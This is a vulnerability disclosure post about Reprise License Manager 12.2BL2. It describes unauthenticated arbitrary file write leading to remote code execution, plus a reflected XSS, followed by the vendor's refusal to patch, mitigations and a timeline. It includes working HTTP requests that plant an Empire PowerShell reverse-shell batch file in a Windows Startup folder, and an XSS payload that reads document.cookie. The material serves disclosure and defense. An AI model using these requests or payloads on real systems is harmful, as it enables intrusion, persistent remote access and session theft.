During a recent engagement, I came across a particularly interesting web application called
RLM, running on the non-standard port
5054. This naturally caught my eye. After a bit of poking around, I was able to identify a critical vulnerability which allowed me to execute code on the server, eventually leading to full domain compromise.
Regrettably, despite my best efforts, the vendor has refused to issue patches as they do not believe these findings to be vulnerabilities (see vendor response below).
In the interest of responsible disclosure, the details are as follows:
Vendor: Reprise Software (http://www.reprisesoftware.com)
Version Affected: 12.2BL2 and earlier
"RLM provides all the features you need and expect from an enterprise-class license manager, yet it is familiar and easy to administer, either on premises or in the cloud."
Unfortunately, the RLM web app running on port
5054 allows attackers to specify an arbitrary license file on the server to read and modify. Exploiting this vulnerability in the web interface provided by
rlm.exe, can result in information leakage or remote code execution via upload of malware.
An XSS (reflected) vulnerability also exists in the license editor and is described later in the article.
PoC: RCE with Arbitrary File Write
Attackers can use the RLM web interface to read and write data to any file on disk as long as
rlm.exe has access to it. By default, RLM's web server running on port
5054, does not require authentication.
To achieve remote code execution, this vulnerability can be used to write malware to either:
- User AppData Startup folder:
- (if rlm.exe is privileged) IIS webroot:
- (if rlm.exe is privileged) All Users Startup folder:
Example RCE via user startup folder
The following example will write the
ConfigureProfile.bat reverse shell to the user startup folder
%APPDATA%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\. This attack does not require administrative access and can be used to execute code if RLM is running as a low-privilege user.
In order to find
rlm.exe's user context and a writeable
Start Menu Startup folder, we can use the web-based diagnostics tool: http://TARGET:5054/goforms/diagnostics
A diagnostics text file will be generated in a user-specified location, which can be read using the web-based license editor:
RLM Server Diagnostics RLM version: 12.2BL2-p1 RLM platform: x64_w3 OS version: 6.2 ISV name: rlm Hostname: DESKTOP-ED1RV9O User: bob Working directory: C:\Users\Bob\Documents\Reprise\rlm.v12.2BL2-x64_w3.admin [...]
The following Empire reverse shell will be written to
@echo off start /b powershell.exe -noP -sta -w 1 -enc SQBG...AEUAWAA= exit /b
Writing the malware to disk
The malware contents are passed via
lfdata and the target path is specified by
POST /goform/edit_lf_process HTTP/1.1 Host: TARGET:5054 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Content-Type: application/x-www-form-urlencoded Content-Length: 1083 Cookie: user2458:13be=:0 Connection: close Upgrade-Insecure-Requests: 1 lfdata=%40echo%20off%20%0Astart%20%2Fb%20powershell%2Eexe%20%2DnoP%20%2Dsta%20%2Dw%201%20%2Denc%20%20SQBG%2E%2E%2EAEUAWAA%3D%20%0Aexit%20%2Fb&ok=Update+License+File&lf=C%3A%5CUsers%5CBob%5CAppData%5CRoaming%5CMicrosoft%5CWindows%5CStart%20Menu%5CPrograms%5CStartup%5CConfigureProfile%2Ebat HTTP/1.0 200 OK Server: GoAhead-Webs Pragma: no-cache Cache-control: no-cache Content-Type: text/html <html> [...]license file C:\Users\Bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ConfigureProfile.bat written.[...]
ConfigureProfile.bat will execute when the user
Bob logs in again. Combining this attack with a denial of service attack could expedite a fresh login or reboot.
rlm.exe is running with elevated privileges, it may be better to write the shell to
%PROGRAMDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ instead.
PoC: XSS (Reflected) in RLM
A cross-site scripting vulnerability exists in the
lf parameter of the
/goform/edit_lf_get_data URL in RLM's web interface.
RLM does not enforce
POST for this URL and the payload can also be passed with a
XSS payload reflected in response
The payload is passed via the
lf parameter either through
GET /goform/edit_lf_get_data?lf=<svg/onload=alert(document.cookie)>&ok=Edit+License+File HTTP/1.1 Host: TARGET:5054 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Content-Type: application/x-www-form-urlencoded Content-Length: 0 Cookie: user2458:13be=:0 Connection: close Upgrade-Insecure-Requests: 1 HTTP/1.0 200 OK Server: GoAhead-Webs Pragma: no-cache Cache-control: no-cache Content-Type: text/html <html> [...] <u>License File: <svg/onload=alert(document.cookie)></u> [...]
Vendor was contacted but refused accept that this was a security risk or to issue a patch. During our email correspondence the general theme could be wrapped up in the following quotes:
"We tell end users not to run the rlm server (which implements the web server) in privileged mode. There is no reason it needs to run with elevated privileges."
Good. That's good practice. Of course they're aware that users ignore your best practices and typically leave defaults in place, right?
"The license and options file editors in the web interface are no more dangerous than notepad or wordpad."
Um, not quite, unless you give access to Notepad or Wordpad on your system to anyone with access to the RLM port. We attempted to explain the difference between an anonymous remotely accessible file editor and
notepad.exe, but the vendor's final response was:
"We do not consider this a vulnerability, any more than vi or notepad are vulnerabilities. Of course, NO ONE should run the servers as root/administrator; if they do, they deserve what they get. They can, also, disable the web interface, or, if they want to run it, they can enable logins for it. So there are plenty of opportunities for an admin to prevent any file writing."
While it's pretty obvious that this support person was not well educated on the potential risk here, the real issue isn't the support staff but an organization that has no approved process to accept third party vulnerability reports. While their response might sound hostile, there was no escalation path for this support person.
The biggest problem we run into during the disclosure process is getting the disclosure in front of the correct audience. Even though these vendors are basically getting a free audit that helps them secure their products for their customers, we are often met with hostility simply because they are unsure how to handle the report. If you don't have the capability to support this process in house there are third party options like Bugcrowd that can get you started and manage the process for you.
If you must use the web server component:
- Do not run RLM with high-privilege
- Limit network access to the RLM web server
- Enable strong authentication for RLM web server
- 05/18/2018 - Vulnerability disclosed to vendor
- 05/18/2018 - Vendor refuses to patch, insisting these are not vulnerabilities
- 05/21/2018 - Vendor is encouraged to reconsider and patch
- 06/04/2018 - Vendor chooses to discontinue communication
- 07/18/2018 - Public disclosure